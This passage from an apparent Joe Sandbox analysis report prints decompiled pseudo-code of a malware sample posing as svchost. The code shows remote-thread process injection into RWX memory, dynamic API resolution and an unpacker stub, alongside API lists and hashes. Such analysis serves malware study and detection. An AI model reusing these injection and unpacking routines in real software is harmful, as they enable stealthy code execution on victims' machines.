                                                                                                                                                                                                                                                                      							if(_t85 != 0) {
                                                                                                                                                                                                                                                                      								VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                      								_v28 = 0;
                                                                                                                                                                                                                                                                      								_t90 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28); // executed
                                                                                                                                                                                                                                                                      								_v8 = _t90;
                                                                                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                      							return 0;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                      						if(_v32 != 0) {
                                                                                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}

















                                                                                                                                                                                                                                                                      0x04001dc6
                                                                                                                                                                                                                                                                      0x04001dd1
                                                                                                                                                                                                                                                                      0x04001f72
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001de1
                                                                                                                                                                                                                                                                      0x04001dea
                                                                                                                                                                                                                                                                      0x04001dfb
                                                                                                                                                                                                                                                                      0x04001e04
                                                                                                                                                                                                                                                                      0x04001e14
                                                                                                                                                                                                                                                                      0x04001e1a
                                                                                                                                                                                                                                                                      0x04001e21
                                                                                                                                                                                                                                                                      0x04001e40
                                                                                                                                                                                                                                                                      0x04001e46
                                                                                                                                                                                                                                                                      0x04001e4d
                                                                                                                                                                                                                                                                      0x04001e87
                                                                                                                                                                                                                                                                      0x04001e96
                                                                                                                                                                                                                                                                      0x04001e9b
                                                                                                                                                                                                                                                                      0x04001e9e
                                                                                                                                                                                                                                                                      0x04001eb0
                                                                                                                                                                                                                                                                      0x04001eec
                                                                                                                                                                                                                                                                      0x04001ef1
                                                                                                                                                                                                                                                                      0x04001ead
                                                                                                                                                                                                                                                                      0x04001ead
                                                                                                                                                                                                                                                                      0x04001efe
                                                                                                                                                                                                                                                                      0x04001f18
                                                                                                                                                                                                                                                                      0x04001f20
                                                                                                                                                                                                                                                                      0x04001f42
                                                                                                                                                                                                                                                                      0x04001f48
                                                                                                                                                                                                                                                                      0x04001f69
                                                                                                                                                                                                                                                                      0x04001f6f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001f6f
                                                                                                                                                                                                                                                                      0x04001f2d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001f33
                                                                                                                                                                                                                                                                      0x04001e66
                                                                                                                                                                                                                                                                      0x04001e6d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001e7a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001e80
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04001e23

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                                                                                                      • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                      • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                      • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 132 401005-40107e LoadLibraryExA GetProcAddress call 401126 137 401083-401099 GetPEB 132->137
                                                                                                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                                                                                                      			E00401005() {
                                                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_pop(_t42);
                                                                                                                                                                                                                                                                      				_t43 = _t42 - 5;
                                                                                                                                                                                                                                                                      				_t1 = _t43 + 0x85; // 0x401085
                                                                                                                                                                                                                                                                      				_t20 =  *_t1();
                                                                                                                                                                                                                                                                      				_t2 = _t43 + 0x29ab9; // 0x42aab9
                                                                                                                                                                                                                                                                      				_t3 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t43 + 0x29af1)) =  *_t3(_t20, _t2);
                                                                                                                                                                                                                                                                      				_t5 = _t43 + 0x29ac8; // 0x42aac8
                                                                                                                                                                                                                                                                      				 *(_t43 + 0x29af5) = LoadLibraryExA(_t5, 0, 0);
                                                                                                                                                                                                                                                                      				_t8 = _t43 + 0x29ad5; // 0x42aad5
                                                                                                                                                                                                                                                                      				_t9 = _t43 + 0x29af5; // 0x74700000
                                                                                                                                                                                                                                                                      				_t10 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t43 + 0x29af9)) =  *_t10( *_t9, _t8);
                                                                                                                                                                                                                                                                      				_t12 = _t43 + 0x29ae4; // 0x42aae4
                                                                                                                                                                                                                                                                      				_t13 = _t43 + 0x29af5; // 0x74700000
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t43 + 0x29afd)) = GetProcAddress( *_t13, _t12);
                                                                                                                                                                                                                                                                      				_t16 = _t43 + 0x2b9; // 0x4012b9
                                                                                                                                                                                                                                                                      				E00401126(_t16, _t43); // executed
                                                                                                                                                                                                                                                                      				asm("lodsd");
                                                                                                                                                                                                                                                                      				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x00401005
                                                                                                                                                                                                                                                                      0x00401006
                                                                                                                                                                                                                                                                      0x0040100c
                                                                                                                                                                                                                                                                      0x00401012
                                                                                                                                                                                                                                                                      0x00401014
                                                                                                                                                                                                                                                                      0x0040101c
                                                                                                                                                                                                                                                                      0x00401024
                                                                                                                                                                                                                                                                      0x0040102a
                                                                                                                                                                                                                                                                      0x0040103b
                                                                                                                                                                                                                                                                      0x00401041
                                                                                                                                                                                                                                                                      0x00401048
                                                                                                                                                                                                                                                                      0x0040104e
                                                                                                                                                                                                                                                                      0x00401056
                                                                                                                                                                                                                                                                      0x0040105c
                                                                                                                                                                                                                                                                      0x00401063
                                                                                                                                                                                                                                                                      0x00401070
                                                                                                                                                                                                                                                                      0x00401077
                                                                                                                                                                                                                                                                      0x0040107e
                                                                                                                                                                                                                                                                      0x00401094
                                                                                                                                                                                                                                                                      0x00401099

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74700000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                                                                                                        • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.814621804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                                                                      • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                                                                                                      • API String ID: 4074058790-1482053243
                                                                                                                                                                                                                                                                      • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                                      • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 161 408bf20-408bf2d 162 408bf3a-408bf3f 161->162 163 408bf41 162->163 164 408bf30-408bf35 163->164 165 408bf43 163->165 166 408bf36-408bf38 164->166 167 408bf48-408bf4a 165->167 166->162 166->163 168 408bf4c-408bf51 167->168 169 408bf53-408bf57 167->169 168->169 170 408bf59 169->170 171 408bf64-408bf67 169->171 172 408bf5b-408bf62 170->172 173 408bf83-408bf88 170->173 174 408bf69-408bf6e 171->174 175 408bf70-408bf72 171->175 172->171 172->173 176 408bf8a-408bf93 173->176 177 408bf9b-408bf9d 173->177 174->175 175->167 178 408c00a-408c00d 176->178 179 408bf95-408bf99 176->179 180 408bf9f-408bfa4 177->180 181 408bfa6 177->181 182 408c012-408c015 178->182 179->181 180->181 183 408bfa8-408bfab 181->183 184 408bf74-408bf76 181->184 187 408c017-408c019 182->187 188 408bfad-408bfb2 183->188 189 408bfb4 183->189 185 408bf78-408bf7d 184->185 186 408bf7f-408bf81 184->186 185->186 191 408bfd5-408bfe4 186->191 187->182 192 408c01b-408c01e 187->192 188->189 189->184 190 408bfb6-408bfb8 189->190 193 408bfba-408bfbf 190->193 194 408bfc1-408bfc5 190->194 195 408bff4-408c001 191->195 196 408bfe6-408bfed 191->196 192->182 197 408c020-408c03c 192->197 193->194 194->190 199 408bfc7 194->199 195->195 201 408c003-408c005 195->201 196->196 200 408bfef 196->200 197->187 198 408c03e 197->198 202 408c044-408c048 198->202 203 408bfc9-408bfd0 199->203 204 408bfd2 199->204 200->166 201->166 205 408c04a-408c060 LoadLibraryA 202->205 206 408c08f-408c092 202->206 203->190 203->204 204->191 207 408c061-408c066 205->207 208 408c095-408c09c 206->208 207->202 209 408c068-408c06a 207->209 210 408c09e-408c0a0 208->210 211 408c0c0-408c0f0 VirtualProtect * 2 208->211 212 408c06c-408c072 209->212 213 408c073-408c080 GetProcAddress 209->213 214 408c0a2-408c0b1 210->214 215 408c0b3-408c0be 210->215 216 408c0f4-408c0f8 211->216 212->213 218 408c089 ExitProcess 213->218 219 408c082-408c087 213->219 214->208 215->214 216->216 217 408c0fa 216->217 219->207
                                                                                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                                                                                      			_entry_() {
                                                                                                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                                                                                                                                                                      				signed int _v416;
                                                                                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v428;
                                                                                                                                                                                                                                                                      				signed int _v432;
                                                                                                                                                                                                                                                                      				void* _v436;
                                                                                                                                                                                                                                                                      				void* _v440;
                                                                                                                                                                                                                                                                      				void* _v444;
                                                                                                                                                                                                                                                                      				void _t72;
                                                                                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                                                                                      				void _t75;
                                                                                                                                                                                                                                                                      				void _t76;
                                                                                                                                                                                                                                                                      				signed int _t78;
                                                                                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                                                                                      				unsigned int _t80;
                                                                                                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                                                                                                      				signed char* _t95;
                                                                                                                                                                                                                                                                      				long _t96;
                                                                                                                                                                                                                                                                      				char* _t99;
                                                                                                                                                                                                                                                                      				signed int _t100;
                                                                                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t108;
                                                                                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                                                                                      				void* _t117;
                                                                                                                                                                                                                                                                      				signed int _t136;
                                                                                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                                                                                      				signed int _t140;
                                                                                                                                                                                                                                                                      				signed int _t141;
                                                                                                                                                                                                                                                                      				intOrPtr* _t144;
                                                                                                                                                                                                                                                                      				signed int* _t146;
                                                                                                                                                                                                                                                                      				signed int _t147;
                                                                                                                                                                                                                                                                      				void* _t160;
                                                                                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                                                                                      				void* _t170;
                                                                                                                                                                                                                                                                      				unsigned int* _t171;
                                                                                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                                                                                                      				signed int _t175;
                                                                                                                                                                                                                                                                      				signed int _t177;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t178;
                                                                                                                                                                                                                                                                      				intOrPtr _t179;
                                                                                                                                                                                                                                                                      				DWORD* _t180;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t181;
                                                                                                                                                                                                                                                                      				void* _t184;
                                                                                                                                                                                                                                                                      				signed int _t186;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				asm("pushad");
                                                                                                                                                                                                                                                                      				_t177 = 0x4063000;
                                                                                                                                                                                                                                                                      				_t1 = _t177 - 0x62000; // 0x4001000
                                                                                                                                                                                                                                                                      				_t170 = _t1;
                                                                                                                                                                                                                                                                      				_push(_t170);
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t138 =  *_t177;
                                                                                                                                                                                                                                                                      					_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      					asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                                                      						if(_t184 < 0) {
                                                                                                                                                                                                                                                                      							_t72 =  *_t177;
                                                                                                                                                                                                                                                                      							_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                      							 *_t170 = _t72;
                                                                                                                                                                                                                                                                      							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                      							__eflags = _t170;
                                                                                                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t73 = 1;
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                      							if(_t139 == 0) {
                                                                                                                                                                                                                                                                      								_t139 =  *_t177;
                                                                                                                                                                                                                                                                      								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							asm("adc eax, eax");
                                                                                                                                                                                                                                                                      							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                      							_t186 = _t140;
                                                                                                                                                                                                                                                                      							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							L26:
                                                                                                                                                                                                                                                                      							if(_t186 != 0) {
                                                                                                                                                                                                                                                                      								L34:
                                                                                                                                                                                                                                                                      								_t147 = 0;
                                                                                                                                                                                                                                                                      								_t74 = _t73 - 3;
                                                                                                                                                                                                                                                                      								__eflags = _t74;
                                                                                                                                                                                                                                                                      								if(_t74 < 0) {
                                                                                                                                                                                                                                                                      									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                      									__eflags = _t140;
                                                                                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                                                                                      										_t140 =  *_t177;
                                                                                                                                                                                                                                                                      										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									L39:
                                                                                                                                                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                                                                                      										_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                                                                                      											_t138 =  *_t177;
                                                                                                                                                                                                                                                                      											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                      										L49:
                                                                                                                                                                                                                                                                      										__eflags = _t178 - 0xfffffb00;
                                                                                                                                                                                                                                                                      										asm("adc ecx, 0x2");
                                                                                                                                                                                                                                                                      										_t160 = _t170 + _t178;
                                                                                                                                                                                                                                                                      										__eflags = _t178 - 0xfffffffc;
                                                                                                                                                                                                                                                                      										if(_t178 <= 0xfffffffc) {
                                                                                                                                                                                                                                                                      											do {
                                                                                                                                                                                                                                                                      												_t75 =  *_t160;
                                                                                                                                                                                                                                                                      												_t160 = _t160 + 4;
                                                                                                                                                                                                                                                                      												 *_t170 = _t75;
                                                                                                                                                                                                                                                                      												_t170 = _t170 + 4;
                                                                                                                                                                                                                                                                      												_t147 = _t147 - 4;
                                                                                                                                                                                                                                                                      												__eflags = _t147;
                                                                                                                                                                                                                                                                      											} while (_t147 > 0);
                                                                                                                                                                                                                                                                      											_t170 = _t170 + _t147;
                                                                                                                                                                                                                                                                      											break;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											goto L50;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										do {
                                                                                                                                                                                                                                                                      											L50:
                                                                                                                                                                                                                                                                      											_t76 =  *_t160;
                                                                                                                                                                                                                                                                      											_t160 = _t160 + 1;
                                                                                                                                                                                                                                                                      											 *_t170 = _t76;
                                                                                                                                                                                                                                                                      											_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                      											_t147 = _t147 - 1;
                                                                                                                                                                                                                                                                      											__eflags = _t147;
                                                                                                                                                                                                                                                                      										} while (_t147 != 0);
                                                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t147 = _t147 + 1;
                                                                                                                                                                                                                                                                      									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                      									__eflags = _t140;
                                                                                                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                                                                                                      										_t140 =  *_t177;
                                                                                                                                                                                                                                                                      										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                                                                                      										do {
                                                                                                                                                                                                                                                                      											do {
                                                                                                                                                                                                                                                                      												L43:
                                                                                                                                                                                                                                                                      												_t141 = _t140 + _t140;
                                                                                                                                                                                                                                                                      												__eflags = _t141;
                                                                                                                                                                                                                                                                      												if(_t141 == 0) {
                                                                                                                                                                                                                                                                      													_t141 =  *_t177;
                                                                                                                                                                                                                                                                      													_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      													asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                      												_t140 = _t141 + _t141;
                                                                                                                                                                                                                                                                      												__eflags = _t140;
                                                                                                                                                                                                                                                                      											} while (__eflags >= 0);
                                                                                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                                                                                      												break;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t140 =  *_t177;
                                                                                                                                                                                                                                                                      											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                      											__eflags = _t177;
                                                                                                                                                                                                                                                                      											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                      										} while (_t177 >= 0);
                                                                                                                                                                                                                                                                      										_t147 = _t147 + 2;
                                                                                                                                                                                                                                                                      										__eflags = _t147;
                                                                                                                                                                                                                                                                      										goto L49;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t78 =  *_t177;
                                                                                                                                                                                                                                                                      								_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                      								_t79 = _t78 ^ 0xffffffff;
                                                                                                                                                                                                                                                                      								__eflags = _t79;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									_pop(_t177);
                                                                                                                                                                                                                                                                      									_t171 = _t177;
                                                                                                                                                                                                                                                                      									goto L55;
                                                                                                                                                                                                                                                                      									do {
                                                                                                                                                                                                                                                                      										do {
                                                                                                                                                                                                                                                                      											L55:
                                                                                                                                                                                                                                                                      											_t80 =  *_t171;
                                                                                                                                                                                                                                                                      											_t171 =  &(_t171[0]);
                                                                                                                                                                                                                                                                      											__eflags = _t80 - 0xe8 - 1;
                                                                                                                                                                                                                                                                      										} while (_t80 - 0xe8 > 1);
                                                                                                                                                                                                                                                                      										__eflags =  *_t171;
                                                                                                                                                                                                                                                                      									} while ( *_t171 != 0);
                                                                                                                                                                                                                                                                      									asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                      									 *_t171 = ( *_t171 >> 8) - _t171 + _t177;
                                                                                                                                                                                                                                                                      									__eflags =  &(_t171[1]);
                                                                                                                                                                                                                                                                      									asm("loop 0xffffffdb");
                                                                                                                                                                                                                                                                      									_t55 = _t177 + 0x89000; // 0x408a000
                                                                                                                                                                                                                                                                      									_t173 = _t55;
                                                                                                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                                                                                                      										L58:
                                                                                                                                                                                                                                                                      										_t90 =  *_t173;
                                                                                                                                                                                                                                                                      										__eflags = _t90;
                                                                                                                                                                                                                                                                      										if(_t90 == 0) {
                                                                                                                                                                                                                                                                      											break;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_t56 =  &(_t173[4]); // 0x2000
                                                                                                                                                                                                                                                                      										_t146 =  *_t56 + _t177;
                                                                                                                                                                                                                                                                      										_t175 =  &(_t173[8]);
                                                                                                                                                                                                                                                                      										__eflags = _t175;
                                                                                                                                                                                                                                                                      										_t178 = LoadLibraryA(_t90 + _t177 + 0x8c000);
                                                                                                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                                                                                                      											_t173 = _t175 + 1;
                                                                                                                                                                                                                                                                      											__eflags =  *_t175;
                                                                                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											if(__eflags < 0) {
                                                                                                                                                                                                                                                                      												_push( *_t173 & 0x0000ffff);
                                                                                                                                                                                                                                                                      												_t173 =  &(_t173[2]);
                                                                                                                                                                                                                                                                      												__eflags = _t173;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											asm("repne scasb");
                                                                                                                                                                                                                                                                      											_t136 = GetProcAddress(_t178, _t173);
                                                                                                                                                                                                                                                                      											__eflags = _t136;
                                                                                                                                                                                                                                                                      											if(_t136 == 0) {
                                                                                                                                                                                                                                                                      												ExitProcess();
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											 *_t146 = _t136;
                                                                                                                                                                                                                                                                      											_t146 =  &(_t146[1]);
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t174 =  &(_t173[4]);
                                                                                                                                                                                                                                                                      									__eflags = _t174;
                                                                                                                                                                                                                                                                      									_t63 = _t177 - 4; // 0x4000ffc
                                                                                                                                                                                                                                                                      									_t144 = _t63;
                                                                                                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                                                                                                      										_t174 = _t174 + 1;
                                                                                                                                                                                                                                                                      										_t93 = 0;
                                                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                                                      										if(0 == 0) {
                                                                                                                                                                                                                                                                      											break;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										__eflags = 0 - 0xef;
                                                                                                                                                                                                                                                                      										if(0 > 0xef) {
                                                                                                                                                                                                                                                                      											_t93 =  *_t174;
                                                                                                                                                                                                                                                                      											_t174 = _t174 + 2;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_t144 = _t144 + _t93;
                                                                                                                                                                                                                                                                      										asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                      										 *_t144 =  *_t144 + _t177;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_t66 = _t177 + 0x8c05c; // 0x74716760
                                                                                                                                                                                                                                                                      									_t179 =  *_t66;
                                                                                                                                                                                                                                                                      									_t67 = _t177 - 0x1000; // 0x4000000
                                                                                                                                                                                                                                                                      									_t170 = _t67;
                                                                                                                                                                                                                                                                      									_t138 = 0x1000;
                                                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                                                      									VirtualProtect(_t170, 0x1000, 4, _t180);
                                                                                                                                                                                                                                                                      									_t68 = _t170 + 0x1df; // 0x40001df
                                                                                                                                                                                                                                                                      									_t95 = _t68;
                                                                                                                                                                                                                                                                      									 *_t95 =  *_t95 & 0x0000007f;
                                                                                                                                                                                                                                                                      									_t69 =  &(_t95[0x28]);
                                                                                                                                                                                                                                                                      									 *_t69 = _t95[0x28] & 0x0000007f;
                                                                                                                                                                                                                                                                      									__eflags =  *_t69;
                                                                                                                                                                                                                                                                      									_pop(_t96);
                                                                                                                                                                                                                                                                      									_push(_t96);
                                                                                                                                                                                                                                                                      									VirtualProtect(_t170, 0x1000, _t96, _t180); // executed
                                                                                                                                                                                                                                                                      									asm("popad");
                                                                                                                                                                                                                                                                      									_t99 =  &_v128;
                                                                                                                                                                                                                                                                      									do {
                                                                                                                                                                                                                                                                      										_push(0);
                                                                                                                                                                                                                                                                      										__eflags = _t180 - _t99;
                                                                                                                                                                                                                                                                      									} while (_t180 != _t99);
                                                                                                                                                                                                                                                                      									_t181 = _t180 - 0xffffff80;
                                                                                                                                                                                                                                                                      									_push(_t179);
                                                                                                                                                                                                                                                                      									_t178 = _t181;
                                                                                                                                                                                                                                                                      									_t180 = _t181 - 0x1b8;
                                                                                                                                                                                                                                                                      									_t100 =  &_v280;
                                                                                                                                                                                                                                                                      									_push(_t100);
                                                                                                                                                                                                                                                                      									_push(0x202); // executed
                                                                                                                                                                                                                                                                      									L0400100C(); // executed
                                                                                                                                                                                                                                                                      									__eflags = _t100;
                                                                                                                                                                                                                                                                      									if(_t100 != 0) {
                                                                                                                                                                                                                                                                      										L17:
                                                                                                                                                                                                                                                                      										ExitProcess(0);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v408 = 0;
                                                                                                                                                                                                                                                                      									_v412 = 0;
                                                                                                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                                                                                                      										_t101 = E04001490(); // executed
                                                                                                                                                                                                                                                                      										_v416 = _t101;
                                                                                                                                                                                                                                                                      										__eflags = _v416;
                                                                                                                                                                                                                                                                      										if(_v416 <= 0) {
